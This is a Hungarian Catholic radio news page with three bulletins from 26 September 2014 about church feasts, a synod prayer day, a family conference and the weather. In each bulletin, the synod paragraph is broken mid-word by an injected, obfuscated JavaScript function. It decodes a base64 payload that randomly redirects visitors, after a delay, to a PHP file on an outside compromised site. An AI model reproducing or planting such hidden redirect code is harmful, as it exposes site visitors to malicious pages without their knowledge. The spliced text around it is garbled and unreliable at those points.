2014. szeptember 26. – Hírek és programajánló

H Í R E K   E S T E

Papszentelés a váradi székesegyházban
Böcskei László megyéspüspök holnap délután 6 órakor kezdődő szentmisén Cristian Chira, nagyváradi születésű diakónust, a Don Orione Kongregáció tagját a nagyváradi székesegyházban áldozópappá szenteli.

Imanap a családdal foglalkozó püspöki szinódusért
Szeptember 28-ra, vasárnapra imanapot hirdetett a püspöki szinódus titkársága az október 5. és 19. között tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó harmadik rendkívüli közgyűlése alkalmából, melynek témája a család. A szinódusi titkárság arra kéri a részegyházakat, plébániai közösségeket, a társulatokat és a mozgalmakat, hogy imádkozzanak a szentmiséken és más ünnepi alkalmakkor a szinódus idején és az azt megelőző napokban. Az erdélyi Mária Rádió is csatlakozik ehhez a felhíváshoz, vasárnap a családdal foglalkozó tematikus napot tart és közös imára hívja hallgatóit.

Szent Mihály napi búcsúk a gyulafehérvári főegyházmegyében
Szeptember 29-én, hétfőn a gyulafehérvári főegyházmegye és székesegyház védőszentjének napján búcsús szentmisét tartanak délelőtt 11 órától. A székesegyházban Jakubinyi György érsek és Tamás József püspök mutatja be az ünnepélyes búcsús szentmisét. A főpásztori szentmise szónoka Pál Vilmos Barna, alcsíki főesperes lesz.
Szeptember 29. a kolozsvári Szent Mihály templom búcsúünnepe is. Szeretettel hívják a híveket, az este 6 órakor kezdődő búcsús szentmisére, hogy imádkozzanak Szent Mihály főangyal pártfogásáért. Szentbeszédet mond dr. Marton József nagyprépost, teológiai tanár.
A Mária Rádió mindkét szentmisét közvetíti. 
Etéden, Székelykeresztúr filiájában szombaton 11 órakor kezdődik a szentmise. A búcsú ünnepi szónoka Madarász Attila bögözi plébános.
A jegenyei egyházközségben szintén holnap 11 órakor kezdődik a búcsús szentmise. A szentbeszédet Szőcs Béla szászfenesi plébános tartja.
Lemhényben, a Szent Mihály napi szentmise vasárnap 12 órakor kezdődik. A búcsú szónoka Varga Rezső gazdasági igazgató Gyulafehérvárról.
Székelyszentmihályon, Nyikómalomfalva filiájában háznál miséznek vasárnap fél 12-kor, az igehirdető Albert István Csaba.
Székelypálfalvának a Szent Mihály főangyal védelmébe ajánlott templomában vasárnap 12 órától kezdődik a búcsús szentmise. A szentbeszédet Bakó Béla Pál ferences atya hirdeti. Orbán Menyhért helyi plébánostól megtudtuk: az elmúlt három évben feljavították a templomot és az idei búcsún emlékeznek meg arról, hogy őseik kétszázötven éve kezdték el az építést, amit tizenegy év múlva fejeztek be.
Csíkszentmihályon hétfőn 11 órakor kezdődik a búcsú. Ünnepi szónoka Marek Bernardin dévai ferences atya lesz.
A türkösi plébániatemplomban hétfőn délután 5 órakor, Kádár István, miklósvári plébános lesz a Szent Mihály napi búcsú ünnepi szónoka.

Idősek világnapja a szatmári egyházmegyében
A szatmárnémeti székesegyházban holnap reggel fél 11-től gyónásra lesz lehetőség, majd 11 órától Schönberger Jenő püspök mutatja be a legszentebb áldozatot. A résztvevők teljes búcsút nyerhetnek a szokott feltételek mellett.

Türi Magyar Napok
Szeptember 27-28-án második alkalommal kerül sor a Türi Magyar Napokra. A Balázsfalvához tartozó Türben, szombaton, a déli harangszó után megáldják a Türi Magyar Házat, majd ünnepi köszöntők, előadások következnek, irodalmi- és kultúrműsorral várják az érdeklődőket. Szeptember 28-án, vasárnap 12 órától ünnepi szentmise lesz, a marosvásárhelyi Remény ének- és zenekar közreműködésével.

Kórustalálkozó, orgonakoncert és búcsú Mezőfényen
150 éves a mezőfényi templom orgonája, valamint a Gyertyaláng nevű egyházi kórus is idén ünnepli 25 éves működését. Szombaton 15 énekkar részvételével kórustalálkozóra kerül sor délelőtt 10 órától a helyi templomban. Vasárnap délelőtt 10 órától ünnepi szentmise lesz, melyet rádiónk közvetít. Délután 3 órától Csengeri Kostyák Zsuzsa kolozsvári orgonaművész ad koncertet.
A mezőfényi templom védőszentje Szent Mihály arkangyal. Búcsúünnepét hétfőn tartják, reggel fél 9 és délelőtt 11 órakor. Mindkét szentmisén Néma Sándor kálmándi plébános prédikál.

Triduum Székelyudvarhelyen
Október 1-jén, szerdán a székelyudvarhelyi Lisieux-i Kis Szent Teréz egyházközség búcsúünnepe. A búcsúünnep
előtt triduumot tartanak, amelyen a város szülöttei lesznek a papi szolgálattevők. A plébánia évében sorra kerülő lelki program témája a nyolc boldogság. Szeptember 28-án, vasárnap a fél 12-kor kezdődő szentmise keretében Mihály Imre csíkszeredai segédlelkész tartja az elmélkedést. Hétfő este fél 7-től Tamás Barna fogarasi plébános és egyházmegyei ifjúsági főlelkész, kedden este fél 7-től Tamás Huba homoródkarácsonyfalvi plébános mutatja be a szentmisét. Október 1-jén, délután 5 órától a búcsús szentmisén Ilyés Zsolt, a csíkszentléleki egyházközség plébánosa lesz az igehirdető.

Az időjárásról: A hétvégén is marad az őszies hangulatot árasztó, felhős idő: szórványosan kialakulnak még záporok, kisebb esők főként reggel és délelőtt. A délutáni óráktól azonban már egyre többfelé szakadozottabbá válik a felhőzet, 15 és 20°C közötti hőmérsékleti értékekre számíthatunk.

MRE - Hírszolgálat, 2014. szeptember 26.


H Í R E K   D É L B E N

Marosvásárhelyen ma kezdődik a XII. Főegyházmegyei Családkonferencia
A három nap célja, hogy a résztvevő házaspárok jobban megismerjék Márton Áron életét, írásait, bátorítást kapjanak arra, hogy a különböző élethelyzetekben kérjék a közbenjárását. 
A konferencia előadói: Kovács Gergely, Nagy Zoltán, Papp László, Lázár Csilla, Szénégető István és Maksay Ágnes. Elsősorban az ő életpéldája, de más, az életszentség útját járó személyek példáját felmutatva is szeretnék felhívni a résztvevők figyelmét arra, hogy a házastársi szerelem az életszentség egyik lehetséges útja, merjenek szentek lenni.

Imanap a családdal foglalkozó püspöki szinódusért
Szeptember 28-ra, vasárnapra imanapot hirdetett a püspöki szinódus titkársága az október 5. és 19. között tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó harmadik rendkívüli közgyűlése alkalmából. Mint ismeretes, a szinódusi ülés témája: „A családdal kapcsolatos lelkipásztori kihívások az evangelizáció összefüggésében”. 
A szinódusi titkárság arra kéri a részegyházakat, plébániai közösségeket, a társulatokat és a mozgalmakat, hogy imádkozzanak a szentmiséken és más ünnepi alkalmakkor a szinódus idején és az azt megelőző napokban. A hívek egyénileg is imádkozhatnak, főként családi körben, mondják el a rózsafüzér. Az erdélyi Mária Rádió is csatlakozik ehhez a felhíváshoz, vasárnap a családdal foglalkozó tematikus napot tart és közös imára hívja hallgatóit.

Vasárnap a Szentírást ünnepeljük
Szentírástudomány védőszentjének, Szent Jeromosnak az ünnepéhez, legközelebb eső vasárnapon tartja az Egyház a Szentírás vasárnapját, idén szeptember 28-án. Jakubinyi György érsek a Szentírás vasárnapjára ebben az évben is főegyházmegyei gyűjtést rendelt el, melynek célja a Szentírás üzenetének terjesztése, a Katolikus Magyar Bibliatársulat támogatása. Idén húszéves a KMB. Az évfordulót október 25-én Csíkszeredában tartják.

Szent Mihály napi búcsúk a gyulafehérvári főegyházmegyében
Szeptember 29-én, hétfőn a gyulafehérvári főegyházmegye és székesegyház védőszentjének napján búcsús szentmisét tartanak délelőtt 11 órától. A székesegyházban Jakubinyi György érsek és Tamás József püspök mutatja be az ünnepélyes búcsús szentmisét. A főpásztori szentmise szónoka Pál Vilmos Barna, alcsíki főesperes lesz.
Szeptember 29. a kolozsvári Szent Mihály templom búcsúünnepe is. Szeretettel hívják a híveket, az este 6 órakor kezdődő búcsús szentmisére, hogy imádkozzanak Szent Mihály főangyal pártfogásáért. Szentbeszédet mond dr. Marton József nagyprépost, teológiai tanár.
A Mária Rádió mindkét szentmisét közvetíti. 
Etéden, Székelykeresztúr filiájában szombaton 11 órakor kezdődik a szentmise. A búcsú ünnepi szónoka Madarász Attila bögözi plébános.
A jegenyei egyházközségben holnap 11 órakor kezdődik a búcsús szentmise. A szentbeszédet Szőcs Béla szászfenesi plébános tartja.
Székelyszentmihályon, Nyikómalomfalva filiájában háznál miséznek vasárnap fél 12-kor, az igehirdető Albert István Csaba.
Csíkszentmihályon hétfőn 11 órakor kezdődik a búcsú. Ünnepi szónoka Marek Bernardin dévai ferences atya lesz.
A türkösi plébániatemplomban hétfőn délután 5 órakor, Kádár István, miklósvári plébános lesz a Szent Mihály napi búcsú ünnepi szónoka.
Székelypálfalvának a Szent Mihály főangyal védelmébe ajánlott templomában vasárnap 12 órától kezdődik a búcsús szentmise. A szentbeszédet Bakó Béla Pál ferences atya hirdeti. Orbán Menyhért helyi plébánostól megtudtuk: az elmúlt három évben feljavították a templomot és az idei búcsún emlékeznek meg arról, hogy őseik kétszázötven éve kezdték el az építést, amit tizenegy év múlva fejeztek be.

Kórustalálkozó és orgonakoncert Mezőfényen
Több évfordulót is ünnepelnek a hétvégén Mezőfényen, mely alkalomból szombaton és vasárnap is kulturális programokra kerül sor. 150 éves a helyi katolikus templom orgonája, valamint a Gyertyaláng nevű egyházi kórus is idén ünnepli 25 éves működését. Szombaton 15 környékbeli és határon túli énekkar - mintegy 430 személy - részvételével kórustalálkozóra kerül sor délelőtt 10 órától a templomban. Vasárnap délelőtt 10 órától ünnepi szentmise lesz, melyet rádiónk közvetít. Délután 3 órától Csengeri Kostyák Zsuzsa kolozsvári orgonaművész ad koncertet. 

Az időjárásról: A hűvös hajnal után a délutáni órákban kisüt a Nap és többfelé felszakadozik a felhőzet is. Szórványosan kialakulnak még záporok, illetve többfelé szeles időre készülhetünk. Az előrejelzések szerint napközben 15 és 20°C közötti hőmérsékleti értékekre számíthatunk.

MRE - Hírszolgálat, 2014. szeptember 26.


H Í R E K   R E G G E L

Marosvásárhelyen ma kezdődik a XII. Főegyházmegyei Családkonferencia
A három nap célja, hogy a résztvevő házaspárok jobban megismerjék Márton Áron életét, írásait, bátorítást kapjanak arra, hogy a különböző élethelyzetekben kérjék a közbenjárását. A konferencia előadói: Kovács Gergely, Nagy Zoltán, Papp László, Lázár Csilla, Szénégető István és Maksay Ágnes. Elsősorban az ő életpéldája, de más, az életszentség útját járó személyek példáját felmutatva is szeretnék felhívni a résztvevők figyelmét arra, hogy a házastársi szerelem az életszentség egyik lehetséges útja, merjenek szentek lenni.

A csíksomlyói kegytemplom elhunyt rendezőire emlékeznek
Szeptember 28-án, vasárnap a délelőtt fél 11-kor kezdődő szentmise keretében emlékeznek meg a csíksomlyói kegytemplom rendezői elhunyt társaikról, akik egykor hűségesen és odaadással szolgálták a Segítő Szűz Mária szentélyét. 
A szervezők kérik az elhunyt rendezők hozzátartozóit és a rendezőség tagjait, hogy amennyiben tehetik, vegyenek részt a megemlékező szentmisén, hogy együtt imádkozhassanak a megboldogultak lelki üdvéért!

Imanap a családdal foglalkozó püspöki szinódusért
Szeptember 28-ra, vasárnapra imanapot hirdetett a püspöki szinódus titkársága az október 5. és 19. között tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó harmadik rendkívüli közgyűlése alkalmából. Mint ismeretes, a szinódusi ülés témája: „A családdal kapcsolatos lelkipásztori kihívások az evangelizáció összefüggésében”. 
A szinódusi titkárság arra kéri a részegyházakat, plébániai közösségeket, a megszentelt élet intézményeit, a társulatokat és a mozgalmakat, hogy imádkozzanak a szentmiséken és más ünnepi alkalmakkor a szinódus idején és az azt megelőző napokban. A hívek egyénileg is imádkozhatnak, főként családi körben, mondják el a rózsafüzér imádságot a szinódusi munkákért. 
Az erdélyi Mária Rádió is csatlakozik ehhez a felhíváshoz, vasárnap a családdal foglalkozó tematikus napot tart és közös imára hívja hallgatóit.

Vasárnap a Szentírást ünnepeljük
Szentírástudomány védőszentjének, Szent Jeromosnak az ünnepéhez, legközelebb eső vasárnapon tartja az Egyház a Szentírás vasárnapját, idén szeptember 28-án. Jakubinyi György érsek a Szentírás vasárnapjára ebben az évben is főegyházmegyei gyűjtést rendelt el, melynek célja a Szentírás üzenetének terjesztése, a Katolikus Magyar Bibliatársulat támogatása. Idén húszéves a KMB. Az évfordulót október 25-én Csíkszeredában tartják.

Szent Mihály ünnepére készülnek a gyulafehérvári főegyházmegyében
Szeptember 29-én, hétfőn a gyulafehérvári főegyházmegye és székesegyház védőszentjének napján búcsús szentmisét tartanak az érseki székhelyen délelőtt 11 órától. A szentmise keretében megemlékeznek arról, hogy 34 évvel ezelőtt hunyt el Isten szolgája Márton Áron hitvalló püspök. 
Szeptember 29. a kolozsvári Szent Mihály templom búcsúünnepe is. Szeretettel hívják a híveket, az este 6 órakor kezdődő búcsús szentmisére, hogy imádkozzanak a Mindenható Isten oltalmáért és Szent Mihály főangyal pártfogásáért. A Mária Rádió mindkét szentmisét közvetíti. 

Pasztorális bizottságok egyházmegyeközi találkozója
Október 7-8. között a kolozsvári Manréza Lelkigyakorlatos Házban tartják az egyházmegyék közös találkozóját. Az idén a programot a szatmáriak szervezik. 
Első nap az elmúlt évet értékelő beszámolók hangzanak el a különböző részterületek képviselőivel, másnap előadás, témafeldolgozás, majd plénum, szervezési kérdések, a folytatás megtervezése várható.

Az időjárásról: Pénteken szórványosan kialakulnak még záporok, illetve többfelé szeles időre készülhetünk. A hűvös hajnal után a délutáni órákban kisüt a Nap és többfelé felszakadozik a felhőzet is. Az előrejelzések szerint napközben 15 és 20°C közötti hőmérsékleti értékekre számíthatunk.

MRE - Hírszolgálat, 2014. szeptember 26.

 

 

About the author

maradmin

Leave a Comment